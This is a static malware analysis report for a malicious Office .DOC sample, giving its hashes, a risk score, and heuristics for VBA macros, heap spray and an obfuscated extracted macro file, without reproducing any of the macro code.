Malicious Office (OLE) / .DOC — malware analysis report

Static analysis result for SHA-256 cc0f6df49467f7dc…

MALICIOUS

Office (OLE) / .DOC

12.0 KB First seen: 2022-11-25
MD5: eafa56496cc62ea0206d492cb09af12e SHA-1: b6c16bd2726fd88308a2c355988ea6a3641d1e69 SHA-256: cc0f6df49467f7dc565faeb3f74bb6bf7dd0cc285304adc3becf343316730537
62 Risk Score

Malware Insights

MITRE ATT&CK
T1059.005 Visual Basic

The presence of VBA macros and a heuristic firing for heap spray indicate malicious intent. The VBA macro code is heavily obfuscated, but its structure suggests it is designed to download and execute a secondary payload. Further analysis of the macro's behavior is required to determine the exact nature of the payload.

Heuristics 3

  • Heap-spray pattern detected high SC_HEAP_SPRAY
    Repeated 0x41 (A) bytes found
  • VBA macros detected medium OLE_VBA_MACROS
    Document contains VBA macro code
  • Suspicious extracted artifact info EXTRACTED_FILE_STATIC_TRIAGE
    One or more files extracted from inside this sample matched static suspicious-content checks such as script obfuscation, encoded payload blobs, packed data, or execution/download terms.

Extracted artifacts 1

Files carved from inside the sample during analysis.

FilenameKindSourceSize
macros.bas
24a0fe488effc6a2a0400044dc83c7b5923f93faf1f10f3f081997eda7a92e61		 vba-macro oletools.olevba.extract_macros (decoded VBA source) 12289 bytes
Detection
ClamAV: No threats found
Obfuscation or payload: likely
Carved artifact contains 1 long base64-like blob(s).

Open this report in the interactive analyzer, or submit your own file for analysis.